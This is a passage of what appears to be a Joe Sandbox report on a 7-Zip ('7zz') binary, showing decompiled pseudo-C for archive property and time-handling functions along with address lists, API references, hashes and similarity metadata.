				_t271 =  *( *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 0x1c)) +  *(_t274 + 0xc) * 4);
				_t120 =  *((intOrPtr*)(_t274 + 0x10));
				_t279 = _t120 - 0xc;
				if(_t279 > 0) {
					_t121 = _t120 - 0xf;
					__eflags = _t121;
					if(_t121 == 0) {
						_t123 = _t271[2] & 0x00000001;
						__eflags = _t271[2] & 0x00000001;
						L84:
						E0040C13B(_t274 - 0x6c, _t123);
						L85:
						E0040C2B2(_t274 - 0x6c, _t287,  *((intOrPtr*)(_t274 + 0x14)));
						 *(_t274 - 4) =  *(_t274 - 4) & 0x00000000;
						E0040C20F(_t274 - 0x6c);
						 *[fs:0x0] =  *((intOrPtr*)(_t274 - 0xc));
						return 0;
					}
					_t128 = _t121 - 4;
					__eflags = _t128;
					if(_t128 == 0) {
						__eflags = E0043B787(_t271, __edx);
						if(__eflags == 0) {
							goto L85;
						}
						_push(_t271[0xc]);
						L40:
						E0040C1A0(_t274 - 0x6c);
						goto L85;
					}
					_t131 = _t128 - 3;
					__eflags = _t131;
					if(_t131 == 0) {
						_t268 = _t271[4];
						 *((intOrPtr*)(_t274 - 0x2c)) = 0;
						 *((intOrPtr*)(_t274 - 0x28)) = 0;
						 *((intOrPtr*)(_t274 - 0x24)) = 0;
						E00401EEE(_t274 - 0x2c, 3);
						__eflags = _t271[2] & 0x00000001;
						 *(_t274 - 4) = 6;
						if((_t271[2] & 0x00000001) == 0) {
							L64:
							__eflags = _t268 - 0xb;
							if(_t268 >= 0xb) {
								L66:
								_t133 = _t268 & 0x0000ffff;
								_t220 = _t133 - 0xc;
								__eflags = _t220;
								if(_t220 == 0) {
									_push( *0x48d500);
									L78:
									E00435B13(_t274 - 0x2c, _t261);
									L79:
									E0040C0D3(_t274 - 0x6c, __eflags,  *((intOrPtr*)(_t274 - 0x2c)));
									 *(_t274 - 4) = 1;
									E00407A18( *((intOrPtr*)(_t274 - 0x2c)));
									L80:
									goto L85;
								}
								_t225 = _t220;
								__eflags = _t225;
								if(_t225 == 0) {
									E00435B13(_t274 - 0x2c, _t261,  *0x48d504);
									__eflags = _t271[2] >> 0x00000001 & 0x00000001;
									if(__eflags == 0) {
										goto L79;
									}
									_push(":EOS");
									goto L78;
								}
								_t227 = _t225 - 0x52;
								__eflags = _t227;
								if(_t227 == 0) {
									_push( *0x48d508);
								} else {
									_t228 = _t227 - 1;
									__eflags = _t228;
									if(_t228 == 0) {
										_push( *0x48d50c);
									} else {
										__eflags = _t228 == 1;
										if(_t228 == 1) {
											_push( *0x48d510);
										} else {
											asm("cdq");
											_push(_t261);
											_push(_t133);
											_t261 = 0xa;
											E004075FF(_t274 - 0x8c, _t261);
											_push(_t274 - 0x8c);
										}
									}
								}
								goto L78;
							}
							_push( *((intOrPtr*)(0x48d4d4 + (_t268 & 0x0000ffff) * 4)));
							goto L78;
						}
						__eflags = _t268 - 0x63;
						if(_t268 != 0x63) {
							__eflags = _t271[2] & 0x00000040;
							if((_t271[2] & 0x00000040) == 0) {
								_push( *0x48d518);
								L62:
								E00435B13(_t274 - 0x2c, _t261);
								L63:
								E00406ACF(_t274 - 0x2c, _t261, __eflags, 0x20);
								goto L64;
							}
							_t146 = E0043B600( &(_t271[0x68]), _t274 - 0x20);
							__eflags = _t146;
							if(_t146 == 0) {
								L60:
								_push( *0x48d51c);
								goto L62;
							}
							_t234 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t234 - 0xb;
								if(_t234 >= 0xb) {
									break;
								}
								_t261 =  *((intOrPtr*)(_t274 - 0x1e));
								_t147 = 0x48d520 + _t234 * 8;
								__eflags = _t261 -  *_t147;
								if(_t261 !=  *_t147) {
									_t234 = _t234 + 1;
									continue;
								}
								_push( *((intOrPtr*)(_t147 + 4)));
								goto L62;
							}
							__eflags = 0;
							if(0 != 0) {
								goto L63;
							}
							goto L60;
						}
						E00409664(_t274 - 0x2c,  *0x48d514);
						 *(_t274 - 0x18) = 2;
						 *(_t274 - 0x16) = 3;
						 *(_t274 - 0x14) = 0;
						__eflags = E0043B585( &(_t271[0x68]), _t274 - 0x18);
						if(__eflags == 0) {
							goto L66;
						}
						E00406ACF(_t274 - 0x2c, _t261, __eflags, 0x2d);
						asm("cdq");
						_push(_t261);
						_push(( *(_t274 - 0x16) & 0x000000ff) + 1 << 6);
						_t261 = 0xa;
						E004075FF(_t274 - 0x8c, _t261);
						E00435B13(_t274 - 0x2c, _t261, _t274 - 0x8c);
						E00406ACF(_t274 - 0x2c, _t261, __eflags, 0x20);
						_t268 =  *(_t274 - 0x14);
						goto L64;
					}
					_t159 = _t131 - 1;
					__eflags = _t159;
					if(_t159 == 0) {
						_t160 = _t271[0x41];
						__eflags = _t160 - 0x14;
						if(__eflags >= 0) {
							_t161 =  *0x48d4d0; // 0x48c5cc
						} else {
							_t161 =  *((intOrPtr*)(0x48d480 + (_t160 & 0x000000ff) * 4));
						}
						E0040C0D3(_t274 - 0x6c, __eflags, _t161);
						goto L85;
					}
					_t164 = _t159 - 5;
					__eflags = _t164;
					if(__eflags == 0) {
						_push(E0043B088(_t274 - 0x5c,  &(_t271[0x7c]), __eflags));
						_push(_t274 - 0x50);
						 *(_t274 - 4) = 4;
						_t167 = E0043B6E5(_t271, __eflags);
						 *(_t274 - 4) = 5;
						E0040C08C(_t274 - 0x6c, __eflags,  *_t167);
						E00407A18( *((intOrPtr*)(_t274 - 0x50)));
						_push( *((intOrPtr*)(_t274 - 0x5c)));
						 *(_t274 - 4) = 1;
						L20:
						E00407A18();
						goto L80;
					}
					_t171 = _t164 - 5;
					__eflags = _t171;
					if(_t171 == 0) {
						_t172 =  *_t271 & 0x000000ff;
						L14:
						_push(_t172);
						goto L40;
					}
					__eflags = _t171 - 7;
					if(__eflags != 0) {
						goto L85;
					}
					_t273 =  &(_t271[0x68]);
					_t175 = E0043B680( &(_t271[0x68]), 0, _t274 - 0x20);
					__eflags = _t175;
					if(_t175 == 0) {
						_t177 = E0043B6B2(_t273, 0, _t274 + 8);
						__eflags = _t177;
						if(_t177 == 0) {
							_push(2);
						} else {
							_push(1);
						}
					} else {
						_push(0);
					}
					goto L40;
				}
				if(_t279 == 0) {
					_t269 =  &(_t271[0x68]);
					_t179 = E0043B680( &(_t271[0x68]), 0, _t274 - 0x18);
					__eflags = _t179;
					if(_t179 != 0) {
						L27:
						_t180 = _t274 - 0x18;
						L28:
						E0040C1E7(_t274 - 0x6c, _t180);
						goto L85;
					}
					_t183 = E0043B6B2(_t269, 0, _t274 + 8);
					__eflags = _t183;
					if(_t183 == 0) {
						_t184 = E0040C677(_t271[8], _t274 - 0x20);
						__eflags = _t184;
						if(_t184 == 0) {
							L26:
							 *(_t274 - 0x18) = 0;
							 *(_t274 - 0x14) = 0;
							goto L27;
						}
						_t187 = LocalFileTimeToFileTime(_t274 - 0x20, _t274 - 0x18);
						__eflags = _t187;
						if(_t187 != 0) {
							goto L27;
						}
						goto L26;
					}
					E0040C6D5( *((intOrPtr*)(_t274 + 8)), _t274 - 0x18);
					goto L27;
				}
				_t189 = _t120 - 3;
				if(_t189 == 0) {
					_push( &(_t271[0x20]));
					_push(_t274 - 0x44);
					_t192 = E0043B6E5(_t271, __eflags);
					 *(_t274 - 4) = 2;
					_t193 = E00425EBC(_t274 - 0x38, _t192);
					 *(_t274 - 4) = 3;
					E0040C08C(_t274 - 0x6c, __eflags,  *_t193);
					E00407A18( *((intOrPtr*)(_t274 - 0x38)));
					_push( *((intOrPtr*)(_t274 - 0x44)));
					 *(_t274 - 4) = 1;
					goto L20;
				}
				_t196 = _t189 - 3;
				if(_t196 == 0) {
					_t123 = E00440593(_t271);
					goto L84;
				}
				_t197 = _t196 - 1;
				if(_t197 == 0) {
					_push(_t271[0x1c]);
					_push(_t271[0x18]);
					L16:
					E0040C1C0(_t274 - 0x6c);
					goto L85;
				}
				_t199 = _t197 - 1;
				if(_t199 == 0) {
					_push(_t271[0x14]);
					_push(_t271[0x10]);
					goto L16;
				}
				_t200 = _t199 - 1;
				if(_t200 == 0) {
					_t172 = E0044062B(_t271);
					goto L14;
				}
				_t201 = _t200 - 1;
				if(_t201 == 0) {
					__eflags = E0043B680( &(_t271[0x68]), 2, _t274 - 0x18);
					if(__eflags == 0) {
						goto L85;
					} else {
						_t180 = _t274 - 0x18;
						goto L28;
					}
				}
				if(_t201 != 1) {
					goto L85;
				}
				_t206 = E0043B680( &(_t271[0x68]), 1, _t274 - 0x18);
				_t287 = _t206;
				if(_t206 == 0) {
					goto L85;
				} else {
					_t180 = _t274 - 0x18;
					goto L28;
				}
			}

0x0043b137
0x0043b13c
0x0043b14c
0x0043b14f
0x0043b152
0x0043b156
0x0043b160
0x0043b167
0x0043b16a
0x0043b16d
0x0043b170
0x0043b2ba
0x0043b2ba
0x0043b2bd
0x0043b543
0x0043b543
0x0043b545
0x0043b549
0x0043b54e
0x0043b554
0x0043b559
0x0043b560
0x0043b579
0x0043b582
0x0043b582
0x0043b2c3
0x0043b2c3
0x0043b2c6
0x0043b534
0x0043b536
0x00000000
0x00000000
0x0043b538
0x0043b317
0x0043b31a
0x00000000
0x0043b31a
0x0043b2cc
0x0043b2cc
0x0043b2cf
0x0043b393
0x0043b39c
0x0043b39f
0x0043b3a2
0x0043b3a5
0x0043b3aa
0x0043b3ae
0x0043b3b2
0x0043b48a
0x0043b48a
0x0043b48e
0x0043b49c
0x0043b49c
0x0043b4a1
0x0043b4a1
0x0043b4a4
0x0043b505
0x0043b50b
0x0043b50e
0x0043b513
0x0043b519
0x0043b521
0x0043b525
0x0043b52a
0x00000000
0x0043b52a
0x0043b4a7
0x0043b4a7
0x0043b4a8
0x0043b4f0
0x0043b4fa
0x0043b4fc
0x00000000
0x00000000
0x0043b4fe
0x00000000
0x0043b4fe
0x0043b4aa
0x0043b4aa
0x0043b4ad
0x0043b4df
0x0043b4af
0x0043b4af
0x0043b4af
0x0043b4b0
0x0043b4d7
0x0043b4b2
0x0043b4b2
0x0043b4b3
0x0043b4cf
0x0043b4b5
0x0043b4b5
0x0043b4b6
0x0043b4b7
0x0043b4c0
0x0043b4c1
0x0043b4cc
0x0043b4cc
0x0043b4b3
0x0043b4b0
0x00000000
0x0043b4ad
0x0043b493
0x00000000
0x0043b493
0x0043b3b8
0x0043b3bc
0x0043b42f
0x0043b433
0x0043b472
0x0043b478
0x0043b47b
0x0043b480
0x0043b485
0x00000000
0x0043b485
0x0043b43e
0x0043b443
0x0043b445
0x0043b46a
0x0043b46a
0x00000000
0x0043b46a
0x0043b447
0x0043b447
0x0043b449
0x0043b449
0x0043b44c
0x00000000
0x00000000
0x0043b44e
0x0043b452
0x0043b459
0x0043b45c
0x0043b463
0x00000000
0x0043b463
0x0043b45e
0x00000000
0x0043b45e
0x0043b466
0x0043b468
0x00000000
0x00000000
0x00000000
0x0043b468
0x0043b3c7
0x0043b3d3
0x0043b3d9
0x0043b3dd
0x0043b3e6
0x0043b3e8
0x00000000
0x00000000
0x0043b3f3
0x0043b406
0x0043b407
0x0043b408
0x0043b40b
0x0043b40c
0x0043b41b
0x0043b425
0x0043b42a
0x00000000
0x0043b42a
0x0043b2d5
0x0043b2d5
0x0043b2d6
0x0043b36d
0x0043b370
0x0043b372
0x0043b380
0x0043b374
0x0043b377
0x0043b377
0x0043b389
0x00000000
0x0043b389
0x0043b2dc
0x0043b2dc
0x0043b2df
0x0043b33b
0x0043b33f
0x0043b342
0x0043b346
0x0043b350
0x0043b354
0x0043b35c
0x0043b361
0x0043b364
0x0043b247
0x0043b247
0x00000000
0x0043b24c
0x0043b2e1
0x0043b2e1
0x0043b2e4
0x0043b328
0x0043b1e0
0x0043b1e0
0x00000000
0x0043b1e0
0x0043b2e6
0x0043b2e9
0x00000000
0x00000000
0x0043b2f2
0x0043b2f9
0x0043b2fe
0x0043b300
0x0043b30c
0x0043b311
0x0043b313
0x0043b324
0x0043b315
0x0043b315
0x0043b315
0x0043b302
0x0043b302
0x0043b302
0x00000000
0x0043b300
0x0043b176
0x0043b255
0x0043b25c
0x0043b261
0x0043b263
0x0043b2a9
0x0043b2a9
0x0043b2ac
0x0043b2b0
0x00000000
0x0043b2b0
0x0043b26c
0x0043b271
0x0043b273
0x0043b288
0x0043b28d
0x0043b28f
0x0043b2a3
0x0043b2a3
0x0043b2a6
0x00000000
0x0043b2a6
0x0043b299
0x0043b29f
0x0043b2a1
0x00000000
0x00000000
0x00000000
0x0043b2a1
0x0043b27b
0x00000000
0x0043b27b
0x0043b17c
0x0043b17f
0x0043b212
0x0043b216
0x0043b217
0x0043b221
0x0043b225
0x0043b22f
0x0043b233
0x0043b23b
0x0043b240
0x0043b243
0x00000000
0x0043b243
0x0043b185
0x0043b188
0x0043b203
0x00000000
0x0043b203
0x0043b18a
0x0043b18b
0x0043b1f9
0x0043b1fc
0x0043b1ec
0x0043b1ef
0x00000000
0x0043b1ef
0x0043b18d
0x0043b18e
0x0043b1e6
0x0043b1e9
0x00000000
0x0043b1e9
0x0043b190
0x0043b191
0x0043b1db
0x00000000
0x0043b1db
0x0043b193
0x0043b194
0x0043b1c9
0x0043b1cb
0x00000000
0x0043b1d1
0x0043b1d1
0x00000000
0x0043b1d1
0x0043b1cb
0x0043b197
0x00000000
0x00000000
0x0043b1a6
0x0043b1ab
0x0043b1ad
0x00000000
0x0043b1b3
0x0043b1b3
0x00000000
0x0043b1b3

APIs

__EH_prolog.LIBCMT ref: 0043B13C
LocalFileTimeToFileTime.KERNEL32(?,?,00000000,?,00000000,?), ref: 0043B299

Part of subcall function 004075FF: __aullrem.LIBCMT ref: 00407628
Part of subcall function 004075FF: __aulldiv.LIBCMT ref: 00407647

Strings

:EOS, xrefs: 0043B4FE

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: FileTime$H_prologLocal__aulldiv__aullrem
String ID: :EOS
API String ID: 2778661161-1291901814
Opcode ID: 2354e7ec4c2b8d6c968416e40d9aa08ba06bc91753a3a1e5fe7f369bb66e9801
Instruction ID: 5c88e5fc1e14b78c74474c3f3572503d3b72a76114a3bd06a3995ebb801c467b
Opcode Fuzzy Hash: 2354e7ec4c2b8d6c968416e40d9aa08ba06bc91753a3a1e5fe7f369bb66e9801
Instruction Fuzzy Hash: 31C1A530900209EACF15EFA5C851BFEB779EF18308F14541FE64267292DB389A05DBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0042D5F3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0042D5F3(void* __ecx, signed int __edx) {
				intOrPtr _t110;
				intOrPtr _t117;
				intOrPtr* _t118;
				void* _t122;
				signed int _t128;
				signed int _t132;
				signed int _t135;
				signed int _t139;
				intOrPtr _t148;
				signed int _t173;
				intOrPtr _t174;
				intOrPtr _t176;
				void* _t177;
				signed int _t178;
				void* _t179;
				signed int* _t182;
				void* _t184;
				void* _t186;
				void* _t187;

				_t173 = __edx;
				E0046B890(E004774E4, _t187);
				_t184 = __ecx;
				_t110 = E0042D241(__edx);
				_t148 =  *((intOrPtr*)(_t187 + 8));
				_t176 = _t110;
				E0040862D();
				E0040867E(_t148, _t176);
				 *(_t187 - 0x10) =  *(_t187 - 0x10) & 0x00000000;
				 *(_t187 - 0x1c) =  *(_t187 - 0x1c) & 0x00000000;
				if(_t176 <= 0) {
					L15:
					_t177 = _t148 + 0x14;
					 *((intOrPtr*)(_t187 + 8)) =  *(_t187 - 0x1c) - 1;
					E0040862D();
					_t155 = _t177;
					E0040867E(_t177,  *((intOrPtr*)(_t187 + 8)));
					_t117 =  *((intOrPtr*)(_t187 + 8));
					if(_t117 <= 0) {
						L18:
						_t178 =  *(_t187 - 0x10);
						if(_t178 <  *((intOrPtr*)(_t187 + 8))) {
							E0042D0F8(_t155);
						}
						_t179 = _t178 -  *((intOrPtr*)(_t187 + 8));
						_t156 = _t148 + 0x28;
						 *((intOrPtr*)(_t187 + 8)) = _t156;
						_t118 = E0040867E(_t156, _t179);
						if(_t179 != 1) {
							if(_t179 <= 0) {
								goto L36;
							} else {
								goto L35;
							}
							do {
								L35:
								_t118 = E00415C6D( *((intOrPtr*)(_t187 + 8)), E0042D241(_t173));
								_t179 = _t179 - 1;
							} while (_t179 != 0);
							goto L36;
						} else {
							_t186 = 0;
							if( *(_t187 - 0x10) <= 0) {
								L32:
								if( *((intOrPtr*)(_t148 + 0x30)) != 1) {
									_t118 = E0042D0F8(_t156);
								}
								L36:
								 *[fs:0x0] =  *((intOrPtr*)(_t187 - 0xc));
								return _t118;
							}
							_t174 =  *((intOrPtr*)(_t148 + 0x1c));
							do {
								if(_t174 <= 0) {
									L27:
									_t156 = 0xffffffff;
									L28:
									if(_t156 < 0) {
										_t156 =  *((intOrPtr*)(_t187 + 8));
										_t118 = E00415C6D( *((intOrPtr*)(_t187 + 8)), _t186);
										goto L32;
									}
									goto L29;
								}
								_t118 =  *((intOrPtr*)(_t148 + 0x20));
								while( *_t118 != _t186) {
									_t156 = 1;
									_t118 = _t118 + 8;
									if(1 < _t174) {
										continue;
									}
									goto L27;
								}
								goto L28;
								L29:
								_t186 = _t186 + 1;
							} while (_t186 <  *(_t187 - 0x10));
							goto L32;
						}
					}
					 *((intOrPtr*)(_t187 - 0x24)) = _t117;
					do {
						 *(_t187 - 0x2c) = E0042D241(_t173);
						_t122 = E0042D241(_t173);
						_t155 = _t177;
						E0042389F(_t177,  *(_t187 - 0x2c), _t122);
						_t92 = _t187 - 0x24;
						 *_t92 =  *((intOrPtr*)(_t187 - 0x24)) - 1;
					} while ( *_t92 != 0);
					goto L18;
				}
				 *((intOrPtr*)(_t187 - 0x24)) = _t176;
				do {
					 *(_t187 - 0x50) =  *(_t187 - 0x50) & 0x00000000;
					 *(_t187 - 0x4c) =  *(_t187 - 0x4c) & 0x00000000;
					 *((intOrPtr*)(_t187 - 0x54)) = 0x47a7ec;
					 *(_t187 - 4) =  *(_t187 - 4) & 0x00000000;
					_push(_t187 - 0x5c);
					E00428C94(_t148);
					 *(_t187 - 4) =  *(_t187 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t187 - 0x54)) = 0x47a7ec;
					E00407A18( *(_t187 - 0x4c));
					_t182 =  *( *((intOrPtr*)(_t148 + 0xc)) +  *(_t148 + 8) * 4 - 4);
					_t128 = E0042D110( *((intOrPtr*)(_t184 + 0x18)));
					_t167 =  *((intOrPtr*)(_t184 + 0x18));
					 *(_t187 + 0xb) = _t128;
					 *(_t187 - 0x14) = _t128 & 0x0000000f;
					E0042D12E( *((intOrPtr*)(_t184 + 0x18)), _t187 - 0x3c, _t128 & 0x0000000f);
					_t132 =  *(_t187 - 0x14);
					if(_t132 > 8) {
						E0042D0F8(_t167);
						_t132 =  *(_t187 - 0x14);
					}
					_t168 = 0;
					 *(_t187 - 0x2c) = 0;
					 *(_t187 - 0x28) = 0;
					if(_t132 > 0) {
						 *((intOrPtr*)(_t187 - 0x18)) = 0;
						 *(_t187 - 0x14) = _t187 + _t132 - 0x3d;
						 *(_t187 - 0x20) = _t132;
						do {
							_t168 =  *((intOrPtr*)(_t187 - 0x18));
							asm("cdq");
							 *(_t187 - 0x2c) =  *(_t187 - 0x2c) | E0046C5A0( *( *(_t187 - 0x14)) & 0x000000ff,  *((intOrPtr*)(_t187 - 0x18)), _t173);
							 *(_t187 - 0x28) =  *(_t187 - 0x28) | _t173;
							 *(_t187 - 0x14) =  *(_t187 - 0x14) - 1;
							 *((intOrPtr*)(_t187 - 0x18)) =  *((intOrPtr*)(_t187 - 0x18)) + 8;
							_t49 = _t187 - 0x20;
							 *_t49 =  *(_t187 - 0x20) - 1;
						} while ( *_t49 != 0);
					}
					 *_t182 =  *(_t187 - 0x2c);
					_t182[1] =  *(_t187 - 0x28);
					if(( *(_t187 + 0xb) & 0x00000010) == 0) {
						_t135 = 1;
						_t182[5] = _t135;
					} else {
						_t182[5] = E0042D241(_t173);
						_t168 =  *((intOrPtr*)(_t184 + 0x18));
						_t135 = E0042D241(_t173);
					}
					_t182[6] = _t135;
					if(( *(_t187 + 0xb) & 0x00000020) != 0) {
						_t139 = E0042D241(_t173);
						_t66 =  &(_t182[2]); // 0x107
						 *(_t187 - 0x20) = _t139;
						E0040FA26(_t66, _t139);
						_t168 =  *((intOrPtr*)(_t184 + 0x18));
						E0042D12E( *((intOrPtr*)(_t184 + 0x18)), _t182[4],  *(_t187 - 0x20));
					}
					if(( *(_t187 + 0xb) & 0x00000080) != 0) {
						E0042D0F8(_t168);
					}
					 *(_t187 - 0x10) =  *(_t187 - 0x10) + _t182[5];
					 *(_t187 - 0x1c) =  *(_t187 - 0x1c) + _t182[6];
					_t80 = _t187 - 0x24;
					 *_t80 =  *((intOrPtr*)(_t187 - 0x24)) - 1;
				} while ( *_t80 != 0);
				goto L15;
			}

0x0042d5f3
0x0042d5f8
0x0042d602
0x0042d608
0x0042d60d
0x0042d610
0x0042d614
0x0042d61c
0x0042d621
0x0042d625
0x0042d62b
0x0042d74c
0x0042d74f
0x0042d755
0x0042d758
0x0042d760
0x0042d762
0x0042d767
0x0042d76c
0x0042d794
0x0042d794
0x0042d79a
0x0042d79c
0x0042d79c
0x0042d7a1
0x0042d7a4
0x0042d7a7
0x0042d7ab
0x0042d7b3
0x0042d7fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0042d7fd
0x0042d7fd
0x0042d809
0x0042d80e
0x0042d80e
0x00000000
0x0042d7b5
0x0042d7b5
0x0042d7ba
0x0042d7ec
0x0042d7f0
0x0042d7f2
0x0042d7f2
0x0042d811
0x0042d817
0x0042d81f
0x0042d81f
0x0042d7bc
0x0042d7bf
0x0042d7c3
0x0042d7d4
0x0042d7d4
0x0042d7d7
0x0042d7d9
0x0042d7e3
0x0042d7e7
0x00000000
0x0042d7e7
0x00000000
0x0042d7d9
0x0042d7c5
0x0042d7c8
0x0042d7cc
0x0042d7cd
0x0042d7d2
0x00000000
0x00000000
0x00000000
0x0042d7d2
0x00000000
0x0042d7db
0x0042d7db
0x0042d7dc
0x00000000
0x0042d7e1
0x0042d7b3
0x0042d76e
0x0042d771
0x0042d77c
0x0042d77f
0x0042d785
0x0042d78a
0x0042d78f
0x0042d78f
0x0042d78f
0x00000000
0x0042d771
0x0042d631
0x0042d634
0x0042d634
0x0042d638
0x0042d641
0x0042d644
0x0042d64b
0x0042d64e
0x0042d656
0x0042d65a
0x0042d65d
0x0042d669
0x0042d670
0x0042d675
0x0042d678
0x0042d67e
0x0042d686
0x0042d68b
0x0042d691
0x0042d693
0x0042d698
0x0042d698
0x0042d69b
0x0042d69f
0x0042d6a2
0x0042d6a5
0x0042d6a7
0x0042d6ae
0x0042d6b1
0x0042d6b4
0x0042d6b7
0x0042d6bd
0x0042d6c3
0x0042d6c6
0x0042d6c9
0x0042d6cc
0x0042d6d0
0x0042d6d0
0x0042d6d0
0x0042d6b4
0x0042d6dc
0x0042d6e1
0x0042d6e4
0x0042d6fd
0x0042d6fe
0x0042d6e6
0x0042d6ee
0x0042d6f1
0x0042d6f4
0x0042d6f4
0x0042d705
0x0042d708
0x0042d70d
0x0042d713
0x0042d716
0x0042d719
0x0042d721
0x0042d727
0x0042d727
0x0042d730
0x0042d732
0x0042d732
0x0042d73a
0x0042d740
0x0042d743
0x0042d743
0x0042d743
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0042D5F8

Part of subcall function 00428C94: __EH_prolog.LIBCMT ref: 00428C99

Strings

c[@, xrefs: 0042D63C
, xrefs: 0042D701

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: $c[@
API String ID: 3519838083-1303465990
Opcode ID: a03fa87157ec859ad137ae3f03af2d14d6f5264f4817a720d9191c650317cd75
Instruction ID: f7f276ab7b0e8e4aae64a949967b144445a492cbfe2f6d3bc49d51a0f31881ab
Opcode Fuzzy Hash: a03fa87157ec859ad137ae3f03af2d14d6f5264f4817a720d9191c650317cd75
Instruction Fuzzy Hash: F9717070E002159BCF14EFA9D4816EEB7B1BF84314F50451FE856B7292CB3CA945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0042CD7D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042CD7D(void* __ecx) {
				signed int _t118;
				signed int _t129;
				signed int* _t130;
				signed int _t150;
				signed int _t151;
				signed int _t160;
				intOrPtr _t162;
				signed int* _t180;
				signed int _t181;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t195;
				signed int _t196;
				intOrPtr _t198;
				void* _t200;
				signed int* _t202;
				void* _t203;

				E0046B890(E004774BC, _t203);
				_t200 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) > 0x20 ||  *((intOrPtr*)(__ecx + 0x1c)) > 0x20) {
					L31:
					_t118 = 0;
				} else {
					E00404AD0(_t203 - 0x28, 1);
					 *((intOrPtr*)(_t203 - 0x28)) = 0x47ab08;
					_t150 = 0;
					 *(_t203 - 4) = 0;
					E0042CFAA(_t203 - 0x28,  *((intOrPtr*)(__ecx + 0x30)) +  *((intOrPtr*)(__ecx + 0x1c)));
					_t190 = 0;
					if( *((intOrPtr*)(_t200 + 0x1c)) <= 0) {
						L5:
						_t191 = 0;
						if( *((intOrPtr*)(_t200 + 0x30)) <= _t150) {
							L8:
							E0042CFAA(_t203 - 0x28,  *((intOrPtr*)(_t200 + 0x44)));
							_t192 = 0;
							if( *((intOrPtr*)(_t200 + 0x1c)) <= _t150) {
								L11:
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E00408604(_t203 - 0x28);
								_t160 = 0x20;
								memset(_t203 - 0xd0, 0, _t160 << 2);
								_t162 = 4;
								 *(_t203 - 0x38) = _t150;
								 *(_t203 - 0x34) = _t150;
								 *(_t203 - 0x30) = _t150;
								 *((intOrPtr*)(_t203 - 0x2c)) = 0;
								 *((intOrPtr*)(_t203 - 0x3c)) = 0x47a668;
								 *(_t203 - 4) = 1;
								 *(_t203 - 0x4c) = _t150;
								 *(_t203 - 0x48) = _t150;
								 *(_t203 - 0x44) = _t150;
								 *((intOrPtr*)(_t203 - 0x40)) = _t162;
								 *((intOrPtr*)(_t203 - 0x50)) = 0x47a668;
								 *(_t203 - 4) = 2;
								 *(_t203 - 0x10) = _t150;
								if( *((intOrPtr*)(_t200 + 8)) > _t150) {
									do {
										 *(_t203 - 0x14) = _t150;
										_t198 =  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc)) +  *(_t203 - 0x10) * 4));
										if( *((intOrPtr*)(_t198 + 0x14)) > _t150) {
											do {
												E00415C6D(_t203 - 0x3c,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x14)));
										}
										 *(_t203 - 0x14) = _t150;
										if( *((intOrPtr*)(_t198 + 0x18)) > _t150) {
											do {
												E00415C6D(_t203 - 0x50,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x18)));
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
									} while ( *(_t203 - 0x10) <  *((intOrPtr*)(_t200 + 8)));
								}
								_t195 = 0;
								if( *((intOrPtr*)(_t200 + 0x1c)) > _t150) {
									do {
										_t151 = 1;
